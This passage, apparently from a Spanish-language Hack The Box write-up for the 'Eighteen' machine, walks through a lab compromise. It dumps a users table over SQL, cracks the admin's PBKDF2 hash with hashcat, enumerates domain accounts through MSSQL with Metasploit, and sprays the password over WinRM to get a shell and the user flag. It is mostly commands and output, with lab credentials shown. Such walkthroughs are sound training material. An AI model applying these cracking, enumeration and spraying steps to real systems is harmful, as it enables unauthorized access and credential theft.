</span></span><span class="line"><span class="cl">allocations </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">analytics </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">visits </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SQL <span class="o">(</span>appdev appdev@financial_planner<span class="o">)</span>&gt; <span class="k">select</span> * from users<span class="p">;</span> </span></span><span class="line"><span class="cl"> id full_name username email password_hash is_admin created_at </span></span><span class="line"><span class="cl">---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ---------- </span></span><span class="line"><span class="cl"><span class="m">1002</span> admin admin admin@eighteen.htb pbkdf2:sha256:600000<span class="nv">$AMtzteQIG7yAbZIa$0673</span>ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133 <span class="m">1</span> 2025-10-29 05:39:03 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SQL <span class="o">(</span>appdev appdev@financial_planner<span class="o">)</span>&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="cracking-the-hash-1">Cracking the Hash</h2> <p>Formateamos el hash similar a <a href="https://sckull.github.io/posts/titanic/#cracking-the-hash">HTB - Titanic</a> para poder ejecutar hashcat.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133</span> </span></span><span class="line"><span class="cl">❯ <span class="nv">digest</span><span class="o">=</span><span class="k">$(</span><span class="nb">echo</span> <span class="s2">&#34;0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133&#34;</span> <span class="p">|</span> xxd -r -p <span class="p">|</span> base64<span class="k">)</span><span class="p">;</span> <span class="nv">salt</span><span class="o">=</span><span class="k">$(</span><span class="nb">echo</span> <span class="s2">&#34;AMtzteQIG7yAbZIa&#34;</span> <span class="p">|</span> base64<span class="k">)</span><span class="p">;</span> <span class="nb">echo</span> <span class="s2">&#34;sha256:60000:</span><span class="si">${</span><span class="nv">salt</span><span class="si">}</span><span class="s2">:</span><span class="si">${</span><span class="nv">digest</span><span class="si">}</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl">sha256:60000:QU10enRlUUlHN3lBYlpJYQo<span class="o">=</span>:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM<span class="o">=</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Ejecutamos hashcat con el wordlist rockyou.txt sobre el archivo de hash. Este muestra la contrasena en texto plano.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\u</span>ser<span class="se">\D</span>ocuments<span class="se">\g</span>ithub<span class="se">\h</span>ashcat-7.1.2&gt; ./hashcat.exe -m <span class="m">10900</span> <span class="s1">&#39;sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=&#39;</span> rockyou.txt </span></span><span class="line"><span class="cl">hashcat <span class="o">(</span>v7.1.2<span class="o">)</span> starting </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># [.. cut ..]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dictionary cache hit: </span></span><span class="line"><span class="cl">* Filename..: rockyou.txt </span></span><span class="line"><span class="cl">* Passwords.: <span class="m">14344385</span> </span></span><span class="line"><span class="cl">* Bytes.....: <span class="m">139921507</span> </span></span><span class="line"><span class="cl">* Keyspace..: <span class="m">14344385</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sha256:600000:QU10enRlUUlHN3lBYlpJYQ<span class="o">==</span>:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM<span class="o">=</span>:iloveyou1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Session..........: hashcat </span></span><span class="line"><span class="cl">Status...........: Cracked </span></span><span class="line"><span class="cl">Hash.Mode........: <span class="m">10900</span> <span class="o">(</span>PBKDF2-HMAC-SHA256<span class="o">)</span> </span></span><span class="line"><span class="cl">Hash.Target......: sha256:600000:QU10enRlUUlHN3lBYlpJYQ<span class="o">==</span>:BnOtkKC0r7Gd...yIcTM<span class="o">=</span> </span></span><span class="line"><span class="cl">Time.Started.....: Sat Nov <span class="m">15</span> 16:48:33 <span class="m">2025</span> <span class="o">(</span><span class="m">9</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">Time.Estimated...: Sat Nov <span class="m">15</span> 16:48:42 <span class="m">2025</span> <span class="o">(</span><span class="m">0</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">Kernel.Feature...: Pure Kernel <span class="o">(</span>password length 0-256 bytes<span class="o">)</span> </span></span><span class="line"><span class="cl">Guess.Base.......: File <span class="o">(</span>rockyou.txt<span class="o">)</span> </span></span><span class="line"><span class="cl">Guess.Queue......: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Speed.#01........: <span class="m">2780</span> H/s <span class="o">(</span>7.33ms<span class="o">)</span> @ Accel:2 Loops:500 Thr:512 Vec:1 </span></span><span class="line"><span class="cl">Recovered........: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> Digests <span class="o">(</span>total<span class="o">)</span>, 1/1 <span class="o">(</span>100.00%<span class="o">)</span> Digests <span class="o">(</span>new<span class="o">)</span> </span></span><span class="line"><span class="cl">Progress.........: 24576/14344385 <span class="o">(</span>0.17%<span class="o">)</span> </span></span><span class="line"><span class="cl">Rejected.........: 0/24576 <span class="o">(</span>0.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Restore.Point....: 0/14344385 <span class="o">(</span>0.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:599500-599999 </span></span><span class="line"><span class="cl">Candidate.Engine.: Device Generator </span></span><span class="line"><span class="cl">Candidates.#01...: <span class="m">123456</span> -&gt; <span class="m">280789</span> </span></span><span class="line"><span class="cl">Hardware.Mon.#01.: Temp: 59c Fan: 30% Util: 99% Core:2760MHz Mem:8251MHz Bus:8 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Started: Sat Nov <span class="m">15</span> 16:48:32 <span class="m">2025</span> </span></span><span class="line"><span class="cl">Stopped: Sat Nov <span class="m">15</span> 16:48:43 <span class="m">2025</span> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\u</span>ser<span class="se">\D</span>ocuments<span class="se">\g</span>ithub<span class="se">\h</span>ashcat-7.1.2&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="admin---website">Admin - Website</h2> <p>Las credenciales dan acceso al dashboard del sitio.</p> <p><img alt="image" src="https://sckull.github.io/images/posts/htb/eighteen/2025_1511319225122.png"></p> <p>El sitio muestra unicamente un usuario registrado.</p> <p><img alt="image" src="https://sckull.github.io/images/posts/htb/eighteen/2025_1511319165916.png"></p> <h2 id="enumerating-users">Enumerating Users</h2> <p>Utilizamos el modulo auxiliar <code>mssql_enum_domain_accounts</code> para la enumeracion de usuarios a traves de MSSQL.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msf auxiliary<span class="o">(</span>admin/mssql/mssql_enum_domain_accounts<span class="o">)</span> &gt; show options </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Module options <span class="o">(</span>auxiliary/admin/mssql/mssql_enum_domain_accounts<span class="o">)</span>: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Name Current Setting Required Description </span></span><span class="line"><span class="cl"> ---- --------------- -------- ----------- </span></span><span class="line"><span class="cl"> FuzzNum <span class="m">10000</span> yes Number of principal_ids to fuzz. </span></span><span class="line"><span class="cl"> PASSWORD iNa2we6haRj2gaw! no The password <span class="k">for</span> the specified username </span></span><span class="line"><span class="cl"> RHOSTS eighteen.htb yes The target host<span class="o">(</span>s<span class="o">)</span>, see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html </span></span><span class="line"><span class="cl"> RPORT <span class="m">1433</span> yes The target port <span class="o">(</span>TCP<span class="o">)</span> </span></span><span class="line"><span class="cl"> USERNAME kevin no The username to authenticate as </span></span><span class="line"><span class="cl"> USE_WINDOWS_AUTHENT <span class="nb">false</span> yes Use windows authentication <span class="o">(</span>requires DOMAIN option <span class="nb">set</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">View the full module info with the info, or info -d command. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">msf auxiliary<span class="o">(</span>admin/mssql/mssql_enum_domain_accounts<span class="o">)</span> &gt; run </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Running module against 10.129.78.214 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - Attempting to connect to the database server at 10.129.78.214:1433 as kevin... </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> 10.129.78.214:1433 - Connected. </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - SQL Server Name: DC01 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - Domain Name: EIGHTEEN </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> 10.129.78.214:1433 - Found the domain sid: 010500000000000515000000dfdeac44d4131d236f599b76 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - Brute forcing <span class="m">10000</span> RIDs through the SQL Server, be patient... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\G</span>uest </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\k</span>rbtgt </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\D</span>omain Users </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\D</span>omain Guests </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\D</span>omain Computers </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\D</span>omain Controllers </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\C</span>ert Publishers </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\S</span>chema Admins </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\G</span>roup Policy Creator Owners </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\R</span>ead-only Domain Controllers </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\C</span>loneable Domain Controllers </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\P</span>rotected Users </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\K</span>ey Admins </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\E</span>nterprise Key Admins </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\F</span>orest Trust Accounts </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\E</span>xternal Trust Accounts </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\R</span>AS and IAS Servers </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\A</span>llowed RODC Password Replication Group </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\D</span>enied RODC Password Replication Group </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\D</span>C01$ </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\D</span>nsAdmins </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\D</span>nsUpdateProxy </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\m</span>ssqlsvc </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\S</span>QLServer2005SQLBrowserUser<span class="nv">$DC01</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\H</span>R </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\I</span>T </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\F</span>inance </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\j</span>amie.dunn </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\j</span>ane.smith </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\a</span>lice.jones </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\a</span>dam.scott </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\b</span>ob.brown </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\c</span>arol.white </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - - EIGHTEEN<span class="se">\d</span>ave.green </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> 10.129.78.214:1433 - <span class="m">38</span> user accounts, groups, and computer accounts were found. </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> 10.129.78.214:1433 - Query results have been saved to: /home/kali/.msf4/loot/20251115170845_default_10.129.78.214_mssql.domain.acc_504033.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Auxiliary module execution completed </span></span><span class="line"><span class="cl">msf auxiliary<span class="o">(</span>admin/mssql/mssql_enum_domain_accounts<span class="o">)</span> &gt; </span></span></code></pre></td></tr></table> </div> </div><p>Creamos un wordlist con los usuarios y grupos encontrados.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ cat /home/kali/.msf4/loot/20251115170845_default_10.129.78.214_mssql.domain.acc_504033.txt <span class="p">|</span> grep EIGHTEEN <span class="p">|</span> cut -d <span class="s1">&#39;\&#39;</span> -f2 <span class="p">|</span> cut -d <span class="s1">&#39;&#34;&#39;</span> -f1 &gt; user_group.txt </span></span><span class="line"><span class="cl">❯ wc -l user_group.txt </span></span><span class="line"><span class="cl"><span class="m">37</span> user_group.txt </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="password-spraying">Password Spraying</h2> <p>Ejecutamos <code>netexec</code> con los usuarios/grupos y la contrasena anterior encontrada a WinRM logrando obtener un par aceptado.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ netexec winrm eighteen.htb -u user_group.txt -p <span class="s1">&#39;iloveyou1&#39;</span> 2&gt;/dev/null <span class="p">|</span> grep <span class="s1">&#39;[+]&#39;</span> </span></span><span class="line"><span class="cl">WINRM 10.129.78.214 <span class="m">5985</span> DC01 <span class="o">[</span>+<span class="o">]</span> eighteen.htb<span class="se">\a</span>dam.scott:iloveyou1 <span class="o">(</span>Pwn3d!<span class="o">)</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h1 id="user---adamscott">User - Adam.Scott</h1> <p>Ejecutamos <code>winrmexec</code> con las credenciales logrado acceder a la maquina y la flag <code>user.txt</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ python ../winrmexec/winrmexec.py -dc-ip 10.129.78.214 adam.scott:iloveyou1@eighteen.htb </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> <span class="s1">&#39;-target_ip&#39;</span> not specified, using eighteen.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> <span class="s1">&#39;-port&#39;</span> not specified, using <span class="m">5985</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> <span class="s1">&#39;-url&#39;</span> not specified, using http://eighteen.htb:5985/wsman </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; whoami </span></span><span class="line"><span class="cl">eighteen<span class="se">\a</span>dam.scott </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; cat ../Desktop/user.txt </span></span><span class="line"><span class="cl">62afe8508a58357cac88b1a98954f6a6 </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="web-app---source-code">Web App - Source Code</h2> <p>En <code>C:\inetpub\eighteen.htb</code> descubrimos el codigo fuente del sitio.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\&gt;</span> dir -force inetpub/eighteen.htb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\i</span>netpub<span class="se">\e</span>ighteen.htb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">d----- 10/27/2025 1:12 PM static </span></span><span class="line"><span class="cl">d----- 11/8/2025 6:29 AM templates </span></span><span class="line"><span class="cl">-a---- 11/8/2025 6:49 AM <span class="m">10646</span> app.py </span></span><span class="line"><span class="cl">-a---- 10/27/2025 1:15 PM <span class="m">57</span> requirements.txt </span></span><span class="line"><span class="cl">-a---- 11/10/2025 12:18 PM <span class="m">611</span> web.config </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\&gt;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Existe un par de credenciales (<code>appdev:MissThisElite$90</code>) para la base de datos.<br /> <div class="expand"> <button type="button" class="expand__button" aria-label="Expand Button"> <span class="expand-icon expand-icon__right"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="currentColor" d="M9.29 15.88L13.17 12 9.29 8.12c-.39-.39-.39-1.02 0-1.41.39-.39 1.02-.39 1.41 0l4.59 4.59c.39.39.39 1.02 0 1.41L10.7 17.3c-.39.39-1.02.39-1.41 0-.38-.39-.39-1.03 0-1.42z"/></svg> </span> Expand me - app.py </button> <div class="expand__content"> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span><span class="lnt">137 </span><span class="lnt">138 </span><span class="lnt">139 </span><span class="lnt">140 </span><span class="lnt">141 </span><span class="lnt">142 </span><span class="lnt">143 </span><span class="lnt">144 </span><span class="lnt">145 </span><span class="lnt">146 </span><span class="lnt">147 </span><span class="lnt">148 </span><span class="lnt">149 </span><span class="lnt">150 </span><span class="lnt">151 </span><span 